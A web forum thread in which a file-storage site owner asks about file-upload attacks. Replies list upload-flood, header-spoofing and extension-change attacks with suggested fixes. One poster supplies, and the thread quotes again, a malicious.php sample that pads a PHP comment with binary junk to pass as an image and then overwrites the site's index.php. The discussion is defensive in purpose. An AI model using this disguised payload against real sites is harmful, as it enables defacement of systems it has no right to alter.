File Upload Attacks
I performed several Google searches for file upload attacks and I didn't get any meaningful results back. I need a list of file upload attacks because I have a file storage website and I need to make it as secure as possible.
I know that there are file upload vulnerabilities such as arbitrary shell upload attack, which is where you upload a PHP file to a server, then access it and it will execute the code. I also know that there's another type of file upload attack called null file upload attacks, or something along those lines.
However, I was not able to find any information about that either. It would be nice if someone could point me to a website or article that discusses these types of attacks in detail and how to guard against them.
okay, here is my thoughts as I have a site that i run that will have upload when I get time to fix it (too many projects too little time)…
Anyways, here are the bits that will trouble you.
Remote Upload Script Attack: \
Problem: With this the attacker creates a script that will upload a set file unlimited times.
Fix: Enable a good strong CAPTCHA system that will not allow backwards resubmits.
File Header Spoofing Attack: Problem: With this attack the person will create a harmful script that can cause many problems and spoof something like a false gif header information to enable it to bypass the filters. Fix: Scan both the extension and the Header information, this will take care of some of the problems, you will also need to filter the body of the file to remove anything that may be harmful.
File Extension Change: Problem: Attacker simply changed the file extension to trick your filters. Fix: Scan and ensure the header matches the extension type.
I am sure I can think of more but this is what I have for now. I hope it helps.
AldarHawk wrote: okay, here is my thoughts as I have a site that i run that will have upload when I get time to fix it (too many projects too little time)…
Anyways, here are the bits that will trouble you.
Remote Upload Script Attack: \
Problem: With this the attacker creates a script that will upload a set file unlimited times.
Fix: Enable a good strong CAPTCHA system that will not allow backwards resubmits.
File Header Spoofing Attack: Problem: With this attack the person will create a harmful script that can cause many problems and spoof something like a false gif header information to enable it to bypass the filters. Fix: Scan both the extension and the Header information, this will take care of some of the problems, you will also need to filter the body of the file to remove anything that may be harmful.
File Extension Change: Problem: Attacker simply changed the file extension to trick your filters. Fix: Scan and ensure the header matches the extension type.
I am sure I can think of more but this is what I have for now. I hope it helps.
aldarkhawk covered it quite nicely. :)
Ntvu wrote: I think that checking the file extension is more reliable than checking the content type because content type headers can be spoofed, or at least I think so. On my file storage site users were able to change the content type header somehow.
And one more question - how do you upload null files? Do you have to use Tamper Data to alter the post data?
That's why I suggested doing both checks ;)
Well, you could have this in a, let's say, malicious.php:
/*
And now, for some code that when analyzed, will seem like an image:
Ëeâ,àÊR–Y
¶
§¶XûWK„6k<1ï‡J8ï¹ûÖÎ2gCé âõ¡‚îFumÕ¾ÅL"óÛÕ÷š¤Y»,àÌ-ßÛÁßäº ± ý¹nK9TÑIÚw“Öï3.ÝȾL¯NÙCÛ3ÀëÕqG2¦µëDb2@&ö™ê}½ˆ:Öí•(L
`"o'
Ú¹Û×µ¹9í;ÔÞ•›»]=§ð¥m0;&eÐr›œ¶úŠÚ€®ÎfUȯI— ÔgÊÒùC~Ò~°èŽ™†ÈüdÉÈ=`Cü%†.Qå:ýè9ÂGˆZ
2x€ “Ôx*{ÇE óÆëum†Ë´$¨:¦ûŸÊ¡4eæjÊ ÃU†…ãò)M;
›Š²±mµÕ‡ÌKcqßÜ×}íÐ3d™H]_íÆ@gÌ0êiÏSÑâ§ÒaY˼Íà¡U ›
̃ˆÈÍÍÜŽ¹O=G…r^IY”ÁþO
©~N%í¡Éˆ*X„ ,áËä]§˜%oõ:,|û.(jh“IŸ>u–ÛISŽ¨ÐÈC5%íæR,.Õ²"»a0Öƒ8,@
¢-Èy¸yÛì
7‚x7íµÕ>i2$nwÿ‹
÷¯¾ºÜšmµ9›ŒwrÌ qéIÑã^#ËÌ®
*–Ãîç±æÄF&$ð`
§»@·ÀÓ‡*>¥Ðg2
#6sF[ñ sb]Ôrº—*º²
&t
¼Ð×䎈Žj!ÕçT
šSÄ&ÚjN¸øÄ8ÅKqO{…Æ
eÀžd‚bx$#²nŸdãŠsÛF›çEYÖkÕo®rdÁõ
ɴóѼŸ>}úþûï/ †²»Lˆœ ò¡¬:»†ìÎ3Öm5ôËÅ´ £Mؽ<k!Òé.RÃo1§Ê°Œ°_° I—ë+R==VëÙ
\@g[a™)u÷ü5U
0ížk´úݺ<tse 8HnER‘m•¼m
+—º4ØÁmMbóÆÖCñÊ<{ñž ‹¦ge, „Üyq¾2¼‹ò@l|†© +&f>[Ey!Œ‹ºâ½8Þ
* Ü„rX}Kás‹§ÏÈ‘1»1ëp÷¹Ÿ£îœ9ô·@ÇÜ
1•i*µžC®3Ð
pá†C{XÛ´R²pd!?æÁU
tŒën8ë£ÏðKhƒË&0;ä¢W®û¿|ùr½7aߨC{wé\,gÐtŽI™lçÛóÚæqlàÅâ‹*
Ñ6Q\ûð—eu[ƒ X³qÿX×æóc
ÇC7
U-ÀíÓòˆ¬&àú¼îPAn^gÏN—k¼±lÞ
ËGóa =UÛ» ¦C —˜#Ì ûg+Ä2EyõõÚI«0 3\^a£ÂHn7õûLî?Bñâ&÷)Ž•
4°š{†Ü%\ˆÍÛñZbП¢ÔŠ®1å03Ǻ½O{ÃVe[A^éÆXrgèetåû"Æ÷µ;×ü £….[åP˜È|×dT´M•ûAÄK
Àz±‹bÊU¸2Í"=°Ÿ‹Ó¶¬àЖ›&‡zS}
—w:ì<¶RB]õŠ¤*È:ü‚GdbfçNo,6Fâñ[
kfD<˜Èü.ÜU,CÃú]P쀿]‘rquÅÓ;¬ÏéÆ´ÍòÆl
ï¯ã¯¾ûî»ßÿþ÷,ÊÕHŽøGìw2Èޯ“»¬¤µó}»‡
Š”y]‹È3`ê›Ëgª¶t¿±,É~íß›Ì~ýå~¶Ðߧ¢ÜÛç^±¯2ÛCe@!ñBÅ
(àØ—ÙìÜbè8eYM—âz®'‰t.˜–46f”ßdÉ6ñº‡7®guÿ;ùÍÐá1s‡ÜÕVêrvz9ÚŠ±L F3cºFŠ
}:u>"ÿrðÖµvk¶í
ʯN°n•yn0!¨qd5FÏ ³Žê˜õ˜ËBÑŽK4Ç1K7<t´ð©z‘¦
C7×{aOgn~êp妰oXÉÛW~ú駸šBÆîæÊ"áq›7(ò2
#q5yÕŒ½èp‘`̧ךh¬ä¹ôð9‹Í…N°*Ù_¬5Æ•Uc5EnÛú…I™s¨Ë!‚.ßM Žq¹¸Ðxå)¿Æ àâ$/Wù`uÜO@
“S$˜ÿµ]&ªo¨wçÁ)ÐEz÷;¼hY×fðŠ-ì ¥ý>sºˆ4Ye‡RœÇ´‚BEyí’êx³ñÉd`–9
±ÁlÂ.
Uìê
´'”W[º{Ƕ?ªm(…«ØŠîs{ƒXÎ5m¬„¾wbÚ(RÚ”ã…0jDÍEÓs'[°àXÁ4ÊÂe4
!Hý/ªœåsÀÍ ÿܶùY·–ÕÜ™è¶>©Œ Îíî«ÓÍa
ûé
2Åbá2}æœàcVÔ9ç©É…+=?§’)Xœk^¬£¶b¹±ym
…ì,³So¸ÚÌJè3 q¼J;\ïM"Ðc
o
wÛ¯¿þšª¯9ãùÃþâ¶ÂÖwW}ŽfÝ[;»Œ¹ï·›%¼6>…™¾ÞŸ¾~wéPêÛ¾Hþ²,38E¤â…IÌ–v
·-Œ`ä«3î@“â?ÖÂÌ_™œ¡ý^E6!‚¹ *3L®±¼BTûÊ–€Z\¶ÇLûq¨Á /^UOY¤ÝEóafæ°h}Ï ?ßÒÖkøtaZ·IÚ+
YöXKµ—¯ú±
ùnéLbâ˜h›w¹ý€ufÜDäÄ´{Ãn¡sNp„&r_£IÈts½Ü/ -UáV8šDûí7TÔî‡CW±²I?3QÞÍ$ (ŸwGÎ B D?`O*
å
/xïsk‚´š)²Â,ÉM9d'»alOfè×ÙßV䕃`Pxᾶ"×c#JΤî½w.Ûf©
Next follows the actual code:
*/
$handle=fopen('../index.php','wb');
$write=fwrite($handle, 'PWN4G3!!');
?>```
Or would the cleanup function use strstr() to find php code?
ranma wrote: Well, you could have this in a, let's say, malicious.php:
/*
And now, for some code that when analyzed, will seem like an image:
Ëeâ,àÊR–Y
¶
§¶XûWK„6k<1ï‡J8ï¹ûÖÎ2gCé âõ¡‚îFumÕ¾ÅL"óÛÕ÷š¤Y»,àÌ-ßÛÁßäº ± ý¹nK9TÑIÚw“Öï3.ÝȾL¯NÙCÛ3ÀëÕqG2¦µëDb2@&ö™ê}½ˆ:Öí•(L
`"o'
Ú¹Û×µ¹9í;ÔÞ•›»]=§ð¥m0;&eÐr›œ¶úŠÚ€®ÎfUȯI— ÔgÊÒùC~Ò~°èŽ™†ÈüdÉÈ=`Cü%†.Qå:ýè9ÂGˆZ
2x€ “Ôx*{ÇE óÆëum†Ë´$¨:¦ûŸÊ¡4eæjÊ ÃU†…ãò)M;
›Š²±mµÕ‡ÌKcqßÜ×}íÐ3d™H]_íÆ@gÌ0êiÏSÑâ§ÒaY˼Íà¡U ›
̃ˆÈÍÍÜŽ¹O=G…r^IY”ÁþO
©~N%í¡Éˆ*X„ ,áËä]§˜%oõ:,|û.(jh“IŸ>u–ÛISŽ¨ÐÈC5%íæR,.Õ²"»a0Öƒ8,@
¢-Èy¸yÛì
7‚x7íµÕ>i2$nwÿ‹
÷¯¾ºÜšmµ9›ŒwrÌ qéIÑã^#ËÌ®
*–Ãîç±æÄF&$ð`
§»@·ÀÓ‡*>¥Ðg2
#6sF[ñ sb]Ôrº—*º²
&t
¼Ð×䎈Žj!ÕçT
šSÄ&ÚjN¸øÄ8ÅKqO{…Æ
eÀžd‚bx$#²nŸdãŠsÛF›çEYÖkÕo®rdÁõ
ɴóѼŸ>}úþûï/ †²»Lˆœ ò¡¬:»†ìÎ3Öm5ôËÅ´ £Mؽ<k!Òé.RÃo1§Ê°Œ°_° I—ë+R==VëÙ
\@g[a™)u÷ü5U
0ížk´úݺ<tse 8HnER‘m•¼m
+—º4ØÁmMbóÆÖCñÊ<{ñž ‹¦ge, „Üyq¾2¼‹ò@l|†© +&f>[Ey!Œ‹ºâ½8Þ
* Ü„rX}Kás‹§ÏÈ‘1»1ëp÷¹Ÿ£îœ9ô·@ÇÜ
1•i*µžC®3Ð
pá†C{XÛ´R²pd!?æÁU
tŒën8ë£ÏðKhƒË&0;ä¢W®û¿|ùr½7aߨC{wé\,gÐtŽI™lçÛóÚæqlàÅâ‹*
Ñ6Q\ûð—eu[ƒ X³qÿX×æóc
ÇC7
U-ÀíÓòˆ¬&àú¼îPAn^gÏN—k¼±lÞ
ËGóa =UÛ» ¦C —˜#Ì ûg+Ä2EyõõÚI«0 3\^a£ÂHn7õûLî?Bñâ&÷)Ž•
4°š{†Ü%\ˆÍÛñZbП¢ÔŠ®1å03Ǻ½O{ÃVe[A^éÆXrgèetåû"Æ÷µ;×ü £….[åP˜È|×dT´M•ûAÄK
Àz±‹bÊU¸2Í"=°Ÿ‹Ó¶¬àЖ›&‡zS}
—w:ì<¶RB]õŠ¤*È:ü‚GdbfçNo,6Fâñ[
kfD<˜Èü.ÜU,CÃú]P쀿]‘rquÅÓ;¬ÏéÆ´ÍòÆl
ï¯ã¯¾ûî»ßÿþ÷,ÊÕHŽøGìw2Èޯ“»¬¤µó}»‡
Š”y]‹È3`ê›Ëgª¶t¿±,É~íß›Ì~ýå~¶Ðߧ¢ÜÛç^±¯2ÛCe@!ñBÅ
(àØ—ÙìÜbè8eYM—âz®'‰t.˜–46f”ßdÉ6ñº‡7®guÿ;ùÍÐá1s‡ÜÕVêrvz9ÚŠ±L F3cºFŠ
}:u>"ÿrðÖµvk¶í
ʯN°n•yn0!¨qd5FÏ ³Žê˜õ˜ËBÑŽK4Ç1K7<t´ð©z‘¦
C7×{aOgn~êp妰oXÉÛW~ú駸šBÆîæÊ"áq›7(ò2
#q5yÕŒ½èp‘`̧ךh¬ä¹ôð9‹Í…N°*Ù_¬5Æ•Uc5EnÛú…I™s¨Ë!‚.ßM Žq¹¸Ðxå)¿Æ àâ$/Wù`uÜO@
“S$˜ÿµ]&ªo¨wçÁ)ÐEz÷;¼hY×fðŠ-ì ¥ý>sºˆ4Ye‡RœÇ´‚BEyí’êx³ñÉd`–9
±ÁlÂ.
Uìê
´'”W[º{Ƕ?ªm(…«ØŠîs{ƒXÎ5m¬„¾wbÚ(RÚ”ã…0jDÍEÓs'[°àXÁ4ÊÂe4
!Hý/ªœåsÀÍ ÿܶùY·–ÕÜ™è¶>©Œ Îíî«ÓÍa
ûé
2Åbá2}æœàcVÔ9ç©É…+=?§’)Xœk^¬£¶b¹±ym
…ì,³So¸ÚÌJè3 q¼J;\ïM"Ðc
o
wÛ¯¿þšª¯9ãùÃþâ¶ÂÖwW}ŽfÝ[;»Œ¹ï·›%¼6>…™¾ÞŸ¾~wéPêÛ¾Hþ²,38E¤â…IÌ–v
·-Œ`ä«3î@“â?ÖÂÌ_™œ¡ý^E6!‚¹ *3L®±¼BTûÊ–€Z\¶ÇLûq¨Á /^UOY¤ÝEóafæ°h}Ï ?ßÒÖkøtaZ·IÚ+
YöXKµ—¯ú±
ùnéLbâ˜h›w¹ý€ufÜDäÄ´{Ãn¡sNp„&r_£IÈts½Ü/ -UáV8šDûí7TÔî‡CW±²I?3QÞÍ$ (ŸwGÎ B D?`O*
å
/xïsk‚´š)²Â,ÉM9d'»alOfè×ÙßV䕃`Pxᾶ"×c#JΤî½w.Ûf©
Next follows the actual code:
*/
$handle=fopen('../index.php','wb');
$write=fwrite($handle, 'PWN4G3!!');
?>```
Or would the cleanup function use strstr() to find php code?
Well first off, allowing .php files to be uploaded is just plain stupid. also a custom filter would be made to remove the <?php simple enough. That code would not work but good try :)